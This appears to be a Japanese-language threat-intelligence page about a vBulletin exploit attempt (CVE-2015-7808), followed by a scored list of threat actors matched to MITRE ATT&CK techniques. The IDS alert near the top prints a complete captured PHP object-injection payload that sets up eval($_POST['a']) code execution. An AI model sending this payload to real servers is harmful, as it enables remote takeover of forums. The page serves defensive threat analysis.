Trusted Design

vBulletin 0-day exploit attempt

概要

[**] [1:10052324:2] 52324 VID72596 vBulletin vB_Api_Hook decodeArguments() PHP Object Injection Attempt Inbound (CVE-2015-7808) 12/30/2015-07:33:24.929349 47.88.13.149:2798 -> x.x.x.x:80 ==pcap== POST /forums/ajax/api/hook/decodeArguments HTTP/1.1=0D=0AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36=0D=0AContent-Type: application/x-www-form-urlencoded=0D=0AHost: x.x.x.x=0D=0AContent-Length: 316=0D=0AExpect: 100-continue=0D=0AConnection: Keep-Alive=0D=0A=0D=0A exit('abbcdeef');&arguments=3DO%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00*%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00*%00recordset%22%3Bs%3A17%3A%22eval%28%24_POST%5B%27a%27%5D%29%22%3B%7D ==pcap==

Created: 2026-02-23

Indicators

Indicatorsは見つかっていない。

類似Pulses

このPulseに関連する脅威アクター (事実ベース)

Kimsuky

Score: 15.26
Matched TTPs:
  • T1053.007 - Container Orchestration Job
  • T1213.006 - Databases
  • T1684 - Social Engineering
  • T1003.003 - NTDS
MITREへのリンク →

Mustang Panda

Score: 6.88
Matched TTPs:
  • T1053.007 - Container Orchestration Job
  • T1556 - Modify Authentication Process
MITREへのリンク →

APT32

Score: 5.20
Matched TTPs:
  • T1684 - Social Engineering
  • T1556 - Modify Authentication Process
MITREへのリンク →

Wizard Spider

Score: 8.13
Matched TTPs:
  • T1684 - Social Engineering
  • T1587 - Develop Capabilities
  • T1556 - Modify Authentication Process
MITREへのリンク →

PLATINUM

Score: 7.00
Matched TTPs:
  • T1684 - Social Engineering
  • T1686 - Disable or Modify System Firewall
MITREへのリンク →

Turla

Score: 5.39
Matched TTPs:
  • T1684 - Social Engineering
  • T1587 - Develop Capabilities
MITREへのリンク →

Lazarus Group

Score: 10.21
Matched TTPs:
  • T1069.001 - Local Groups
  • T1587 - Develop Capabilities
  • T1556 - Modify Authentication Process
MITREへのリンク →

APT28

Score: 8.67
Matched TTPs:
  • T1548.004 - Elevated Execution with Prompt
  • T1055.008 - Ptrace System Calls
MITREへのリンク →

SideCopy

Score: 4.13
Matched TTPs:
  • T1584.002 - DNS Server
MITREへのリンク →

Volt Typhoon

Score: 4.13
Matched TTPs:
  • T1584.002 - DNS Server
MITREへのリンク →

APT29

Score: 9.08
Matched TTPs:
  • T1218.009 - Regsvcs/Regasm
  • T1223 - Compiled HTML File
MITREへのリンク →

Contagious Interview

Score: 7.28
Matched TTPs:
  • T1059.006 - Python
  • T1556 - Modify Authentication Process
MITREへのリンク →

HAFNIUM

Score: 4.13
Matched TTPs:
  • T1055.008 - Ptrace System Calls
MITREへのリンク →

Ember Bear

Score: 4.13
Matched TTPs:
  • T1003.003 - NTDS
MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Kimsuky

Score: 0.72
Matched TTPs:
  • T1684 - Social Engineering
  • T1003.003 - NTDS
  • T1053.007 - Container Orchestration Job
  • T1213.006 - Databases
MITREへのリンク →

Related CVEs

Pulse – 脅威アクター グラフ

← Pulse一覧に戻る